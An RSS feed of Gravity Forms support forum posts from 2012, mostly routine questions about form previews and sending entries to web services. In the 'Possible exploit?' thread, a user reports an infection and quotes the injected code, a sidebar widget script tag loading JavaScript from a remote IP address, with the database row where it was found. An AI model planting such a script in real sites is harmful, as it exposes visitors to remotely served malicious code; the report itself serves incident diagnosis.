<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="bbPress/1.0.1" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>Gravity Support Forums User Favorites: mhmi</title>
		<link><a href='https://legacy.forums.gravityhelp.com/profile/mhmi'>mhmi</a></link>
		<description>Gravity Support Forums User Favorites: mhmi</description>
		<language>en-US</language>
		<pubDate>Sun, 19 Apr 2026 20:34:27 +0000</pubDate>
		<generator>http://bbpress.org/?v=1.0.1</generator>
		<textInput>
			<title><![CDATA[Search]]></title>
			<description><![CDATA[Search all topics from these forums.]]></description>
			<name>q</name>
			<link>https://legacy.forums.gravityhelp.com/search.php</link>
		</textInput>
		<atom:link href="https://legacy.forums.gravityhelp.com/rss/profile/" rel="self" type="application/rss+xml" />

		<item>
			<title>David Smith on "Possible exploit?"</title>
			<link>https://legacy.forums.gravityhelp.com/topic/possible-exploit#post-91622</link>
			<pubDate>Thu, 15 Nov 2012 18:50:47 +0000</pubDate>
			<dc:creator>David Smith</dc:creator>
			<guid isPermaLink="false">91622@https://legacy.forums.gravityhelp.com/</guid>
			<description>&#60;p&#62;Hi ionata,&#60;/p&#62;
&#60;p&#62;It looks like whatever this is is adding a text widget to your sidebar. Is Gravity Forms the last item in the sidebar? If so, there is a good chance it is just coincidentally under the Gravity Form widget.&#60;/p&#62;
&#60;p&#62;Hopefully the logging will provide more information on what event is triggering the injection and we can dig into this more from there.
&#60;/p&#62;</description>
		</item>
		<item>
			<title>Tom on "Display results, then submit"</title>
			<link>https://legacy.forums.gravityhelp.com/topic/display-results-then-submit#post-91597</link>
			<pubDate>Thu, 15 Nov 2012 16:57:07 +0000</pubDate>
			<dc:creator>Tom</dc:creator>
			<guid isPermaLink="false">91597@https://legacy.forums.gravityhelp.com/</guid>
			<description>&#60;p&#62;Yep. That works like a charm :) Just implemented it too!
&#60;/p&#62;</description>
		</item>
		<item>
			<title>docholoday on "Display results, then submit"</title>
			<link>https://legacy.forums.gravityhelp.com/topic/display-results-then-submit#post-91592</link>
			<pubDate>Thu, 15 Nov 2012 16:48:03 +0000</pubDate>
			<dc:creator>docholoday</dc:creator>
			<guid isPermaLink="false">91592@https://legacy.forums.gravityhelp.com/</guid>
			<description>&#60;p&#62;Thanks David, that looks like just the thing!
&#60;/p&#62;</description>
		</item>
		<item>
			<title>Chris Hajer on "Possible exploit?"</title>
			<link>https://legacy.forums.gravityhelp.com/topic/possible-exploit#post-91430</link>
			<pubDate>Thu, 15 Nov 2012 08:19:24 +0000</pubDate>
			<dc:creator>Chris Hajer</dc:creator>
			<guid isPermaLink="false">91430@https://legacy.forums.gravityhelp.com/</guid>
			<description>&#60;p&#62;I'll bring this to the attention of the developers to see if they can spot anything in your report related to Gravity Forms.  Thank you.
&#60;/p&#62;</description>
		</item>
		<item>
			<title>ionata on "Possible exploit?"</title>
			<link>https://legacy.forums.gravityhelp.com/topic/possible-exploit#post-91301</link>
			<pubDate>Thu, 15 Nov 2012 01:40:53 +0000</pubDate>
			<dc:creator>ionata</dc:creator>
			<guid isPermaLink="false">91301@https://legacy.forums.gravityhelp.com/</guid>
			<description>&#60;p&#62;Hey guys.&#60;/p&#62;
&#60;p&#62;We've been using Gravity Forms for quite a while now without any issue, but recently one of our sites has been regularly suffering from malware infections.&#60;/p&#62;
&#60;p&#62;It injects an entry into the wp_options table and attaches the extra div containing the offsite script below the Gravity Form widgets like thus:&#60;/p&#62;
&#60;pre&#62;&#60;code&#62;&#38;lt;div class=&#38;quot;textwidget&#38;quot;&#38;gt;
      &#38;lt;script type=&#38;quot;text/javascript&#38;quot; src=&#38;quot;http://61.19.251.27/web/cb.php&#38;quot;&#38;gt;&#38;lt;/script&#38;gt;
&#38;lt;/div&#38;gt;&#60;/code&#62;&#60;/pre&#62;
&#60;p&#62;Which, in the DB can be seen as: &#60;/p&#62;
&#60;p&#62;'mysql&#38;gt; select * from wp_options where option_value like &#34;%http://61.19.251.27/web/cb.php%&#34;;&#60;br /&#62;
+-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+&#60;br /&#62;
&#124; option_id &#124; option_name &#124; option_value                                                                                                                                                                                                                                   &#124; autoload &#124;&#60;br /&#62;
+-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+&#60;br /&#62;
&#124;        87 &#124; widget_text &#124; a:3:{i:3;a:3:{s:5:&#34;title&#34;;s:0:&#34;&#34;;s:4:&#34;text&#34;;s:0:&#34;&#34;;s:6:&#34;filter&#34;;b:0;}i:7;a:3:{s:5:&#34;title&#34;;s:1:&#34; &#34;;s:4:&#34;text&#34;;s:78:&#34;&#38;lt;script type=&#34;text/javascript&#34; src=&#34;http://61.19.251.27/web/cb.php&#34;&#38;gt;&#38;lt;/script&#38;gt;&#34;;s:6:&#34;filter&#34;;b:0;}s:12:&#34;_multiwidget&#34;;i:1;} &#124; yes      &#124;&#60;br /&#62;
+-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+&#60;br /&#62;
1 row in set (0.00 sec)'&#60;/p&#62;
&#60;p&#62;It's not a lot of information but its all we have at this stage. As I mentioned, it's happened once before - it's no trouble removing the infection when it occurs, but preventing it in the first place is giving us trouble. &#60;/p&#62;
&#60;p&#62;I've bumped up the logging for this site so that if it happens again we might get a better lock on it.  Also this is not an on-disk attack, that is to say that no files are modified.  So the injection is done through wordpress itself.  It may not be the Gravity Forms plugin that is the target of the exploit, but it does seem strangely close to it .
&#60;/p&#62;</description>
		</item>
		<item>
			<title>David Peralty on "Display results, then submit"</title>
			<link>https://legacy.forums.gravityhelp.com/topic/display-results-then-submit#post-91239</link>
			<pubDate>Wed, 14 Nov 2012 22:40:21 +0000</pubDate>
			<dc:creator>David Peralty</dc:creator>
			<guid isPermaLink="false">91239@https://legacy.forums.gravityhelp.com/</guid>
			<description>&#60;p&#62;I think this tutorial should help give you what you want:&#60;br /&#62;
&#60;a href=&#34;http://gravitywiz.com/2012/08/04/better-pre-submission-confirmation/&#34; rel=&#34;nofollow&#34;&#62;http://gravitywiz.com/2012/08/04/better-pre-submission-confirmation/&#60;/a&#62;
&#60;/p&#62;</description>
		</item>
		<item>
			<title>docholoday on "Display results, then submit"</title>
			<link>https://legacy.forums.gravityhelp.com/topic/display-results-then-submit#post-91135</link>
			<pubDate>Wed, 14 Nov 2012 13:32:45 +0000</pubDate>
			<dc:creator>docholoday</dc:creator>
			<guid isPermaLink="false">91135@https://legacy.forums.gravityhelp.com/</guid>
			<description>&#60;p&#62;Hi there,&#60;br /&#62;
I've used Gravity form over and over again for the basic features (contact forms, etc) but now I've been asked for something a little more advanced. Our in-house graphics department would like a form that people can fill out to request new business cards (if they run out, or change departments, etc). Normally they fill out a paper form, the artist creates a preview of how their card will look, and emails it to them. &#60;/p&#62;
&#60;p&#62;Could I do something similar with Gravity forms?&#60;/p&#62;
&#60;p&#62;Capturing the data is simple enough, but is there a way to create a &#34;preview&#34; before the form is submitted? It wouldn't even have to be styled in any special way, even just a literal display of what they entered (not an image), some sort of &#34;are you sure?&#34; statement, THEN the actual submit button.&#60;/p&#62;
&#60;p&#62;Basically, just a way for them to confirm the data before submitting it?&#60;/p&#62;
&#60;p&#62;Is there any mechanism in GF to do something similar? Can anyone point me the right direction?
&#60;/p&#62;</description>
		</item>
		<item>
			<title>daniebroz on "Pass data from form to external URL via a Web Service call"</title>
			<link>https://legacy.forums.gravityhelp.com/topic/pass-data-from-form-to-external-url-via-a-web-service-call#post-88489</link>
			<pubDate>Wed, 07 Nov 2012 16:27:21 +0000</pubDate>
			<dc:creator>daniebroz</dc:creator>
			<guid isPermaLink="false">88489@https://legacy.forums.gravityhelp.com/</guid>
			<description>&#60;p&#62;I figured out another way to approach this by using the product fielid instead.  Thanks for your hellp!
&#60;/p&#62;</description>
		</item>
		<item>
			<title>daniebroz on "Pass data from form to external URL via a Web Service call"</title>
			<link>https://legacy.forums.gravityhelp.com/topic/pass-data-from-form-to-external-url-via-a-web-service-call#post-88097</link>
			<pubDate>Tue, 06 Nov 2012 19:42:49 +0000</pubDate>
			<dc:creator>daniebroz</dc:creator>
			<guid isPermaLink="false">88097@https://legacy.forums.gravityhelp.com/</guid>
			<description>&#60;p&#62;I figured out the unique numbering by using this post&#60;br /&#62;
&#60;a href=&#34;http://www.gravityhelp.com/forums/topic/guid-entry-id#post-1491&#34; rel=&#34;nofollow&#34;&#62;http://www.gravityhelp.com/forums/topic/guid-entry-id#post-1491&#60;/a&#62;&#60;/p&#62;
&#60;p&#62;I am writing the code for the gform_after_submission&#60;br /&#62;
I have a product field that uses radio button options, how can I pull the chosen options Price into my&#60;br /&#62;
  $body = array (&#60;br /&#62;
        'Amount' =&#38;gt; $entry{}&#60;/p&#62;
&#60;p&#62;It seems I need a if...else statement.  Will this accomplish what I need?  &#60;a href=&#34;http://pastie.org/5337585&#34; rel=&#34;nofollow&#34;&#62;http://pastie.org/5337585&#60;/a&#62;
&#60;/p&#62;</description>
		</item>
		<item>
			<title>daniebroz on "Pass data from form to external URL via a Web Service call"</title>
			<link>https://legacy.forums.gravityhelp.com/topic/pass-data-from-form-to-external-url-via-a-web-service-call#post-88043</link>
			<pubDate>Tue, 06 Nov 2012 16:41:18 +0000</pubDate>
			<dc:creator>daniebroz</dc:creator>
			<guid isPermaLink="false">88043@https://legacy.forums.gravityhelp.com/</guid>
			<description>&#60;p&#62;It is working now, thanks.&#60;/p&#62;
&#60;p&#62;How would I add the entry ID to this code to send as a unique invoice number.  After reading some post on creating unique number is seems that would be easiest.
&#60;/p&#62;</description>
		</item>

	</channel>
</rss>
